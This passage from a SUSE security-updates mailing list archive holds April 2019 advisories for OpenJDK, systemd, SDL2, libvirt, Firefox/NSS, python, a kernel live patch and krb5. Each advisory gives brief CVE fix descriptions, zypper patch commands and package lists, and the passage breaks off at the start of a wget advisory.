To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server for SAP 12-SP1:

   zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-49=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   java-1_7_0-openjdk-1.7.0.201-43.18.1
   java-1_7_0-openjdk-debuginfo-1.7.0.201-43.18.1
   java-1_7_0-openjdk-debugsource-1.7.0.201-43.18.1
   java-1_7_0-openjdk-demo-1.7.0.201-43.18.1
   java-1_7_0-openjdk-demo-debuginfo-1.7.0.201-43.18.1
   java-1_7_0-openjdk-devel-1.7.0.201-43.18.1
   java-1_7_0-openjdk-devel-debuginfo-1.7.0.201-43.18.1
   java-1_7_0-openjdk-headless-1.7.0.201-43.18.1
   java-1_7_0-openjdk-headless-debuginfo-1.7.0.201-43.18.1

References:

https://www.suse.com/security/cve/CVE-2018-13785.html
https://www.suse.com/security/cve/CVE-2018-16435.html
https://www.suse.com/security/cve/CVE-2018-2938.html
https://www.suse.com/security/cve/CVE-2018-2940.html
https://www.suse.com/security/cve/CVE-2018-2952.html
https://www.suse.com/security/cve/CVE-2018-2973.html
https://www.suse.com/security/cve/CVE-2018-3136.html
https://www.suse.com/security/cve/CVE-2018-3139.html
https://www.suse.com/security/cve/CVE-2018-3149.html
https://www.suse.com/security/cve/CVE-2018-3169.html
https://www.suse.com/security/cve/CVE-2018-3180.html
https://www.suse.com/security/cve/CVE-2018-3214.html
https://www.suse.com/security/cve/CVE-2018-3639.html
https://bugzilla.suse.com/1101644
https://bugzilla.suse.com/1101645
https://bugzilla.suse.com/1101651
https://bugzilla.suse.com/1101656
https://bugzilla.suse.com/1112142
https://bugzilla.suse.com/1112143
https://bugzilla.suse.com/1112144
https://bugzilla.suse.com/1112146
https://bugzilla.suse.com/1112147
https://bugzilla.suse.com/1112152
https://bugzilla.suse.com/1112153

From sle-security-updates at lists.suse.com Fri Apr 12 16:14:44 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 13 Apr 2019 00:14:44 +0200 (CEST)
Subject: SUSE-SU-2019:0425-2: important: Security update for systemd
Message-ID: <20190412221444.70CF3FD26@maintenance.suse.de>

SUSE Security Update: Security update for systemd
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0425-2
Rating:             important
References:         #1125352
Cross-References:   CVE-2019-6454
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for systemd fixes the following issues:

Security vulnerability fixed:

- CVE-2019-6454: Fixed a crash of PID1 caused by an unprivileged user sending a specially crafted D-Bus message on the system bus (bsc#1125352).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server for SAP 12-SP1:

   zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-425=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):

   systemd-bash-completion-210-116.22.1

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   libgudev-1_0-0-210-116.22.1
   libgudev-1_0-0-32bit-210-116.22.1
   libgudev-1_0-0-debuginfo-210-116.22.1
   libgudev-1_0-0-debuginfo-32bit-210-116.22.1
   libgudev-1_0-devel-210-116.22.1
   libudev-devel-210-116.22.1
   libudev1-210-116.22.1
   libudev1-32bit-210-116.22.1
   libudev1-debuginfo-210-116.22.1
   libudev1-debuginfo-32bit-210-116.22.1
   systemd-210-116.22.1
   systemd-32bit-210-116.22.1
   systemd-debuginfo-210-116.22.1
   systemd-debuginfo-32bit-210-116.22.1
   systemd-debugsource-210-116.22.1
   systemd-devel-210-116.22.1
   systemd-sysvinit-210-116.22.1
   typelib-1_0-GUdev-1_0-210-116.22.1
   udev-210-116.22.1
   udev-debuginfo-210-116.22.1

References:

https://www.suse.com/security/cve/CVE-2019-6454.html
https://bugzilla.suse.com/1125352

From sle-security-updates at lists.suse.com Mon Apr 15 07:10:15 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 15 Apr 2019 15:10:15 +0200 (CEST)
Subject: SUSE-SU-2019:0950-1: moderate: Security update for SDL2
Message-ID: <20190415131015.6A08010128@maintenance.suse.de>

SUSE Security Update: Security update for SDL2
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0950-1
Rating:             moderate
References:         #1124799 #1124800 #1124802 #1124803 #1124805 #1124806 #1124824 #1124825 #1124826 #1124827 #1125099
Cross-References:   CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638
Affected Products:
                    SUSE Linux Enterprise Module for Desktop Applications 15
______________________________________________________________________________

An update that fixes 11 vulnerabilities is now available.

Description:

This update for SDL2 fixes the following issues:

Security issues fixed:

- CVE-2019-7572: Fixed a buffer over-read in IMA_ADPCM_nibble in audio/SDL_wave.c (bsc#1124806).
- CVE-2019-7578: Fixed a heap-based buffer over-read in InitIMA_ADPCM in audio/SDL_wave.c (bsc#1125099).
- CVE-2019-7576: Fixed a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (bsc#1124799).
- CVE-2019-7573: Fixed a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (bsc#1124805).
- CVE-2019-7635: Fixed a heap-based buffer over-read in Blit1to4 in video/SDL_blit_1.c (bsc#1124827).
- CVE-2019-7636: Fixed a heap-based buffer over-read in SDL_GetRGB in video/SDL_pixels.c (bsc#1124826).
- CVE-2019-7638: Fixed a heap-based buffer over-read in Map1toN in video/SDL_pixels.c (bsc#1124824).
- CVE-2019-7574: Fixed a heap-based buffer over-read in IMA_ADPCM_decode in audio/SDL_wave.c (bsc#1124803).
- CVE-2019-7575: Fixed a heap-based buffer overflow in MS_ADPCM_decode in audio/SDL_wave.c (bsc#1124802).
- CVE-2019-7637: Fixed a heap-based buffer overflow in the SDL_FillRect function in SDL_surface.c (bsc#1124825).
- CVE-2019-7577: Fixed a buffer over-read in SDL_LoadWAV_RW in audio/SDL_wave.c (bsc#1124800).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Desktop Applications 15:

   zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-950=1

Package List:

- SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):

   SDL2-debugsource-2.0.8-3.9.1
   libSDL2-2_0-0-2.0.8-3.9.1
   libSDL2-2_0-0-debuginfo-2.0.8-3.9.1
   libSDL2-devel-2.0.8-3.9.1

References:

https://www.suse.com/security/cve/CVE-2019-7572.html
https://www.suse.com/security/cve/CVE-2019-7573.html
https://www.suse.com/security/cve/CVE-2019-7574.html
https://www.suse.com/security/cve/CVE-2019-7575.html
https://www.suse.com/security/cve/CVE-2019-7576.html
https://www.suse.com/security/cve/CVE-2019-7577.html
https://www.suse.com/security/cve/CVE-2019-7578.html
https://www.suse.com/security/cve/CVE-2019-7635.html
https://www.suse.com/security/cve/CVE-2019-7636.html
https://www.suse.com/security/cve/CVE-2019-7637.html
https://www.suse.com/security/cve/CVE-2019-7638.html
https://bugzilla.suse.com/1124799
https://bugzilla.suse.com/1124800
https://bugzilla.suse.com/1124802
https://bugzilla.suse.com/1124803
https://bugzilla.suse.com/1124805
https://bugzilla.suse.com/1124806
https://bugzilla.suse.com/1124824
https://bugzilla.suse.com/1124825
https://bugzilla.suse.com/1124826
https://bugzilla.suse.com/1124827
https://bugzilla.suse.com/1125099

From sle-security-updates at lists.suse.com Mon Apr 15 07:12:47 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 15 Apr 2019 15:12:47 +0200 (CEST)
Subject: SUSE-SU-2019:0948-1: moderate: Security update for libvirt
Message-ID: <20190415131247.16527FD1B@maintenance.suse.de>

SUSE Security Update: Security update for libvirt
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0948-1
Rating:             moderate
References:         #1081516 #1102604 #1112182 #1120813 #1125665 #1126325 #1127458 #1131595
Cross-References:   CVE-2019-3840 CVE-2019-3886
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP4
______________________________________________________________________________

An update that solves two vulnerabilities and has 6 fixes is now available.

Description:

This update for libvirt fixes the following issues:

Security issues fixed:

- CVE-2019-3840: Fixed a null pointer dereference vulnerability in the virJSONValueObjectHasKey function which could have resulted in a remote denial of service via the guest agent (bsc#1127458).
- CVE-2019-3886: Fixed an information leak which allowed retrieving the guest hostname in readonly mode (bsc#1131595).

Other issues addressed:

- libxl: support Xen's max_grant_frames setting with maxGrantFrames attribute on the xenbus controller (bsc#1126325).
- conf: added new 'xenbus' controller type.
- util: skip RDMA detection for non-PCI network devices (bsc#1112182).
- qemu: don't use CAP_DAC_OVERRIDE capability if non-root (bsc#1125665).
- qemu: fix issues related to restricted permissions on /dev/sev (bsc#1102604).
- libxl: save current memory value after successful balloon (bsc#1120813).
- libxl: Add support for soft reset (bsc#1081516).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Software Development Kit 12-SP4:

   zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-948=1

- SUSE Linux Enterprise Server 12-SP4:

   zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-948=1

- SUSE Linux Enterprise Desktop 12-SP4:

   zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-948=1

Package List:

- SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

   libvirt-debugsource-4.0.0-8.9.1
   libvirt-devel-4.0.0-8.9.1

- SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

   libvirt-4.0.0-8.9.1
   libvirt-admin-4.0.0-8.9.1
   libvirt-admin-debuginfo-4.0.0-8.9.1
   libvirt-client-4.0.0-8.9.1
   libvirt-client-debuginfo-4.0.0-8.9.1
   libvirt-daemon-4.0.0-8.9.1
   libvirt-daemon-config-network-4.0.0-8.9.1
   libvirt-daemon-config-nwfilter-4.0.0-8.9.1
   libvirt-daemon-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-interface-4.0.0-8.9.1
   libvirt-daemon-driver-interface-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-lxc-4.0.0-8.9.1
   libvirt-daemon-driver-lxc-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-network-4.0.0-8.9.1
   libvirt-daemon-driver-network-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-nodedev-4.0.0-8.9.1
   libvirt-daemon-driver-nodedev-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-nwfilter-4.0.0-8.9.1
   libvirt-daemon-driver-nwfilter-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-qemu-4.0.0-8.9.1
   libvirt-daemon-driver-qemu-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-secret-4.0.0-8.9.1
   libvirt-daemon-driver-secret-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-4.0.0-8.9.1
   libvirt-daemon-driver-storage-core-4.0.0-8.9.1
   libvirt-daemon-driver-storage-core-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-disk-4.0.0-8.9.1
   libvirt-daemon-driver-storage-disk-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-iscsi-4.0.0-8.9.1
   libvirt-daemon-driver-storage-iscsi-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-logical-4.0.0-8.9.1
   libvirt-daemon-driver-storage-logical-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-mpath-4.0.0-8.9.1
   libvirt-daemon-driver-storage-mpath-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-scsi-4.0.0-8.9.1
   libvirt-daemon-driver-storage-scsi-debuginfo-4.0.0-8.9.1
   libvirt-daemon-hooks-4.0.0-8.9.1
   libvirt-daemon-lxc-4.0.0-8.9.1
   libvirt-daemon-qemu-4.0.0-8.9.1
   libvirt-debugsource-4.0.0-8.9.1
   libvirt-doc-4.0.0-8.9.1
   libvirt-libs-4.0.0-8.9.1
   libvirt-libs-debuginfo-4.0.0-8.9.1
   libvirt-lock-sanlock-4.0.0-8.9.1
   libvirt-lock-sanlock-debuginfo-4.0.0-8.9.1
   libvirt-nss-4.0.0-8.9.1
   libvirt-nss-debuginfo-4.0.0-8.9.1

- SUSE Linux Enterprise Server 12-SP4 (aarch64 x86_64):

   libvirt-daemon-driver-storage-rbd-4.0.0-8.9.1
   libvirt-daemon-driver-storage-rbd-debuginfo-4.0.0-8.9.1

- SUSE Linux Enterprise Server 12-SP4 (x86_64):

   libvirt-daemon-driver-libxl-4.0.0-8.9.1
   libvirt-daemon-driver-libxl-debuginfo-4.0.0-8.9.1
   libvirt-daemon-xen-4.0.0-8.9.1

- SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

   libvirt-4.0.0-8.9.1
   libvirt-admin-4.0.0-8.9.1
   libvirt-admin-debuginfo-4.0.0-8.9.1
   libvirt-client-4.0.0-8.9.1
   libvirt-client-debuginfo-4.0.0-8.9.1
   libvirt-daemon-4.0.0-8.9.1
   libvirt-daemon-config-network-4.0.0-8.9.1
   libvirt-daemon-config-nwfilter-4.0.0-8.9.1
   libvirt-daemon-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-interface-4.0.0-8.9.1
   libvirt-daemon-driver-interface-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-libxl-4.0.0-8.9.1
   libvirt-daemon-driver-libxl-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-lxc-4.0.0-8.9.1
   libvirt-daemon-driver-lxc-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-network-4.0.0-8.9.1
   libvirt-daemon-driver-network-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-nodedev-4.0.0-8.9.1
   libvirt-daemon-driver-nodedev-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-nwfilter-4.0.0-8.9.1
   libvirt-daemon-driver-nwfilter-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-qemu-4.0.0-8.9.1
   libvirt-daemon-driver-qemu-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-secret-4.0.0-8.9.1
   libvirt-daemon-driver-secret-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-4.0.0-8.9.1
   libvirt-daemon-driver-storage-core-4.0.0-8.9.1
   libvirt-daemon-driver-storage-core-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-disk-4.0.0-8.9.1
   libvirt-daemon-driver-storage-disk-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-iscsi-4.0.0-8.9.1
   libvirt-daemon-driver-storage-iscsi-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-logical-4.0.0-8.9.1
   libvirt-daemon-driver-storage-logical-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-mpath-4.0.0-8.9.1
   libvirt-daemon-driver-storage-mpath-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-rbd-4.0.0-8.9.1
   libvirt-daemon-driver-storage-rbd-debuginfo-4.0.0-8.9.1
   libvirt-daemon-driver-storage-scsi-4.0.0-8.9.1
   libvirt-daemon-driver-storage-scsi-debuginfo-4.0.0-8.9.1
   libvirt-daemon-lxc-4.0.0-8.9.1
   libvirt-daemon-qemu-4.0.0-8.9.1
   libvirt-daemon-xen-4.0.0-8.9.1
   libvirt-debugsource-4.0.0-8.9.1
   libvirt-doc-4.0.0-8.9.1
   libvirt-libs-4.0.0-8.9.1
   libvirt-libs-debuginfo-4.0.0-8.9.1

References:

https://www.suse.com/security/cve/CVE-2019-3840.html
https://www.suse.com/security/cve/CVE-2019-3886.html
https://bugzilla.suse.com/1081516
https://bugzilla.suse.com/1102604
https://bugzilla.suse.com/1112182
https://bugzilla.suse.com/1120813
https://bugzilla.suse.com/1125665
https://bugzilla.suse.com/1126325
https://bugzilla.suse.com/1127458
https://bugzilla.suse.com/1131595

From sle-security-updates at lists.suse.com Mon Apr 15 13:08:54 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 15 Apr 2019 21:08:54 +0200 (CEST)
Subject: SUSE-SU-2018:4236-2: important: Security update for MozillaFirefox, mozilla-nspr and mozilla-nss
Message-ID: <20190415190854.87FB0FD1B@maintenance.suse.de>

SUSE Security Update: Security update for MozillaFirefox, mozilla-nspr and mozilla-nss
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:4236-2
Rating:             important
References:         #1097410 #1106873 #1119069 #1119105
Cross-References:   CVE-2018-0495 CVE-2018-12384 CVE-2018-12404 CVE-2018-12405 CVE-2018-17466 CVE-2018-18492 CVE-2018-18493 CVE-2018-18494 CVE-2018-18498
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes 9 vulnerabilities is now available.

Description:

This update for MozillaFirefox, mozilla-nss and mozilla-nspr fixes the following issues:

Issues fixed in MozillaFirefox:

- Update to Firefox ESR 60.4 (bsc#1119105)
- CVE-2018-17466: Fixed a buffer overflow and out-of-bounds read in ANGLE library with TextureStorage11
- CVE-2018-18492: Fixed a use-after-free with select element
- CVE-2018-18493: Fixed a buffer overflow in accelerated 2D canvas with Skia
- CVE-2018-18494: Fixed a same-origin policy violation using location attribute and performance.getEntries to steal cross-origin URLs
- CVE-2018-18498: Fixed an integer overflow when calculating buffer sizes for images
- CVE-2018-12405: Fixed a few memory safety bugs

Issues fixed in mozilla-nss:

- Update to NSS 3.40.1 (bsc#1119105)
- CVE-2018-12404: Fixed a cache side-channel variant of the Bleichenbacher attack (bsc#1119069)
- CVE-2018-12384: Fixed an issue in the SSL handshake. NSS responded to an SSLv2-compatible ClientHello with a ServerHello that had an all-zero random. (bsc#1106873)
- CVE-2018-0495: Fixed a memory-cache side-channel attack with ECDSA signatures (bsc#1097410)
- Fixed a decryption failure during FFDHE key exchange
- Various security fixes in the ASN.1 code

Issues fixed in mozilla-nspr:

- Update mozilla-nspr to 4.20 (bsc#1119105)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
  Alternatively you can run the command listed for your product:

  - SUSE Linux Enterprise Server for SAP 12-SP1:

    zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-952=1

Package List:

  - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

    MozillaFirefox-60.4.0esr-109.55.1
    MozillaFirefox-debuginfo-60.4.0esr-109.55.1
    MozillaFirefox-debugsource-60.4.0esr-109.55.1
    MozillaFirefox-devel-60.4.0esr-109.55.1
    MozillaFirefox-translations-common-60.4.0esr-109.55.1
    libfreebl3-3.40.1-58.18.1
    libfreebl3-32bit-3.40.1-58.18.1
    libfreebl3-debuginfo-3.40.1-58.18.1
    libfreebl3-debuginfo-32bit-3.40.1-58.18.1
    libsoftokn3-3.40.1-58.18.1
    libsoftokn3-32bit-3.40.1-58.18.1
    libsoftokn3-debuginfo-3.40.1-58.18.1
    libsoftokn3-debuginfo-32bit-3.40.1-58.18.1
    mozilla-nspr-32bit-4.20-19.6.1
    mozilla-nspr-4.20-19.6.1
    mozilla-nspr-debuginfo-32bit-4.20-19.6.1
    mozilla-nspr-debuginfo-4.20-19.6.1
    mozilla-nspr-debugsource-4.20-19.6.1
    mozilla-nspr-devel-4.20-19.6.1
    mozilla-nss-3.40.1-58.18.1
    mozilla-nss-32bit-3.40.1-58.18.1
    mozilla-nss-certs-3.40.1-58.18.1
    mozilla-nss-certs-32bit-3.40.1-58.18.1
    mozilla-nss-certs-debuginfo-3.40.1-58.18.1
    mozilla-nss-certs-debuginfo-32bit-3.40.1-58.18.1
    mozilla-nss-debuginfo-3.40.1-58.18.1
    mozilla-nss-debuginfo-32bit-3.40.1-58.18.1
    mozilla-nss-debugsource-3.40.1-58.18.1
    mozilla-nss-devel-3.40.1-58.18.1
    mozilla-nss-sysinit-3.40.1-58.18.1
    mozilla-nss-sysinit-32bit-3.40.1-58.18.1
    mozilla-nss-sysinit-debuginfo-3.40.1-58.18.1
    mozilla-nss-sysinit-debuginfo-32bit-3.40.1-58.18.1
    mozilla-nss-tools-3.40.1-58.18.1
    mozilla-nss-tools-debuginfo-3.40.1-58.18.1

References:

  https://www.suse.com/security/cve/CVE-2018-0495.html
  https://www.suse.com/security/cve/CVE-2018-12384.html
  https://www.suse.com/security/cve/CVE-2018-12404.html
  https://www.suse.com/security/cve/CVE-2018-12405.html
  https://www.suse.com/security/cve/CVE-2018-17466.html
  https://www.suse.com/security/cve/CVE-2018-18492.html
  https://www.suse.com/security/cve/CVE-2018-18493.html
  https://www.suse.com/security/cve/CVE-2018-18494.html
  https://www.suse.com/security/cve/CVE-2018-18498.html
  https://bugzilla.suse.com/1097410
  https://bugzilla.suse.com/1106873
  https://bugzilla.suse.com/1119069
  https://bugzilla.suse.com/1119105


From sle-security-updates at lists.suse.com  Mon Apr 15 13:09:54 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 15 Apr 2019 21:09:54 +0200 (CEST)
Subject: SUSE-SU-2019:14018-1: important: Security update for python
Message-ID: <20190415190954.0B08EFD1B@maintenance.suse.de>

SUSE Security Update: Security update for python
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14018-1
Rating:             important
References:         #1129346 #1130847
Cross-References:   CVE-2019-9636 CVE-2019-9948
Affected Products:
                    SUSE Linux Enterprise Server 11-SP4-LTSS
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP4
                    SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

  An update that fixes two vulnerabilities is now available.

Description:

  This update for python fixes the following issues:

  Security issues fixed:

  - CVE-2019-9948: Fixed a 'file:' blacklist bypass in URIs by using the
    'local-file:' scheme instead (bsc#1130847).
  - CVE-2019-9636: Fixed an information disclosure because of incorrect
    handling of Unicode encoding during NFKC normalization (bsc#1129346).

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".
  Alternatively you can run the command listed for your product:

  - SUSE Linux Enterprise Server 11-SP4-LTSS:

    zypper in -t patch slessp4-python-14018=1

  - SUSE Linux Enterprise Point of Sale 11-SP3:

    zypper in -t patch sleposp3-python-14018=1

  - SUSE Linux Enterprise Debuginfo 11-SP4:

    zypper in -t patch dbgsp4-python-14018=1

  - SUSE Linux Enterprise Debuginfo 11-SP3:

    zypper in -t patch dbgsp3-python-14018=1

Package List:

  - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64):

    libpython2_6-1_0-2.6.9-40.24.1
    python-2.6.9-40.24.1
    python-base-2.6.9-40.24.1
    python-curses-2.6.9-40.24.1
    python-demo-2.6.9-40.24.1
    python-gdbm-2.6.9-40.24.1
    python-idle-2.6.9-40.24.1
    python-tk-2.6.9-40.24.1
    python-xml-2.6.9-40.24.1

  - SUSE Linux Enterprise Server 11-SP4-LTSS (ppc64 s390x x86_64):

    libpython2_6-1_0-32bit-2.6.9-40.24.1
    python-32bit-2.6.9-40.24.1
    python-base-32bit-2.6.9-40.24.1

  - SUSE Linux Enterprise Server 11-SP4-LTSS (noarch):

    python-doc-2.6-8.40.24.1
    python-doc-pdf-2.6-8.40.24.1

  - SUSE Linux Enterprise Point of Sale 11-SP3 (noarch):

    python-doc-2.6-8.40.24.1
    python-doc-pdf-2.6-8.40.24.1

  - SUSE Linux Enterprise Point of Sale 11-SP3 (i586):

    libpython2_6-1_0-2.6.9-40.24.1
    python-2.6.9-40.24.1
    python-base-2.6.9-40.24.1
    python-curses-2.6.9-40.24.1
    python-demo-2.6.9-40.24.1
    python-gdbm-2.6.9-40.24.1
    python-idle-2.6.9-40.24.1
    python-tk-2.6.9-40.24.1
    python-xml-2.6.9-40.24.1

  - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64):

    python-base-debuginfo-2.6.9-40.24.1
    python-base-debugsource-2.6.9-40.24.1
    python-debuginfo-2.6.9-40.24.1
    python-debugsource-2.6.9-40.24.1

  - SUSE Linux Enterprise Debuginfo 11-SP4 (ppc64 s390x x86_64):

    python-base-debuginfo-32bit-2.6.9-40.24.1
    python-debuginfo-32bit-2.6.9-40.24.1

  - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):

    python-base-debuginfo-2.6.9-40.24.1
    python-base-debugsource-2.6.9-40.24.1
    python-debuginfo-2.6.9-40.24.1
    python-debugsource-2.6.9-40.24.1

  - SUSE Linux Enterprise Debuginfo 11-SP3 (s390x x86_64):

    python-base-debuginfo-32bit-2.6.9-40.24.1
    python-debuginfo-32bit-2.6.9-40.24.1

References:

  https://www.suse.com/security/cve/CVE-2019-9636.html
  https://www.suse.com/security/cve/CVE-2019-9948.html
  https://bugzilla.suse.com/1129346
  https://bugzilla.suse.com/1130847


From sle-security-updates at lists.suse.com  Tue Apr 16 10:09:28 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 16 Apr 2019 18:09:28 +0200 (CEST)
Subject: SUSE-SU-2019:0955-1: important: Security update for the Linux Kernel (Live Patch 28 for SLE 12 SP2)
Message-ID: <20190416160928.D338A10127@maintenance.suse.de>

SUSE Security Update: Security update for the Linux Kernel (Live Patch 28 for SLE 12 SP2)
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0955-1
Rating:             important
References:         #1102682
Cross-References:   CVE-2018-5390
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server 12-SP2-LTSS
______________________________________________________________________________

  An update that fixes one vulnerability is now available.

Description:

  This update for the Linux Kernel 4.4.121-92_104 fixes one issue.

  The following security issue was fixed:

  - CVE-2018-5390: The Linux kernel could be forced to make very expensive
    calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every
    incoming packet, which can lead to a denial of service (bsc#1102682).

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".
  Alternatively you can run the command listed for your product:

  - SUSE Linux Enterprise Server for SAP 12-SP2:

    zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-955=1

  - SUSE Linux Enterprise Server 12-SP2-LTSS:

    zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-955=1

Package List:

  - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):

    kgraft-patch-4_4_121-92_104-default-2-2.1

  - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le x86_64):

    kgraft-patch-4_4_121-92_104-default-2-2.1

References:

  https://www.suse.com/security/cve/CVE-2018-5390.html
  https://bugzilla.suse.com/1102682


From sle-security-updates at lists.suse.com  Tue Apr 16 10:10:43 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 16 Apr 2019 18:10:43 +0200 (CEST)
Subject: SUSE-SU-2019:0113-2: important: Security update for krb5
Message-ID: <20190416161043.C0AF610124@maintenance.suse.de>

SUSE Security Update: Security update for krb5
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0113-2
Rating:             important
References:         #1120489
Cross-References:   CVE-2018-20217
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

  An update that fixes one vulnerability is now available.

Description:

  This update for krb5 fixes the following issues:

  Security issue fixed:

  - CVE-2018-20217: Fixed an assertion issue with older encryption types
    (bsc#1120489)

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".
  Alternatively you can run the command listed for your product:

  - SUSE Linux Enterprise Server for SAP 12-SP1:

    zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-113=1

Package List:

  - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

    krb5-1.12.1-38.13.2
    krb5-32bit-1.12.1-38.13.2
    krb5-client-1.12.1-38.13.2
    krb5-client-debuginfo-1.12.1-38.13.2
    krb5-debuginfo-1.12.1-38.13.2
    krb5-debuginfo-32bit-1.12.1-38.13.2
    krb5-debugsource-1.12.1-38.13.2
    krb5-doc-1.12.1-38.13.2
    krb5-plugin-kdb-ldap-1.12.1-38.13.2
    krb5-plugin-kdb-ldap-debuginfo-1.12.1-38.13.2
    krb5-plugin-preauth-otp-1.12.1-38.13.2
    krb5-plugin-preauth-otp-debuginfo-1.12.1-38.13.2
    krb5-plugin-preauth-pkinit-1.12.1-38.13.2
    krb5-plugin-preauth-pkinit-debuginfo-1.12.1-38.13.2
    krb5-server-1.12.1-38.13.2
    krb5-server-debuginfo-1.12.1-38.13.2

References:

  https://www.suse.com/security/cve/CVE-2018-20217.html
  https://bugzilla.suse.com/1120489


From sle-security-updates at lists.suse.com  Tue Apr 16 10:11:29 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 16 Apr 2019 18:11:29 +0200 (CEST)
Subject: SUSE-SU-2019:0956-1: important: Security update for wget
Message-ID: <20190416161129.8660110124@maintenance.suse.de>

SUSE Security Update: Security update for wget
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0956-1
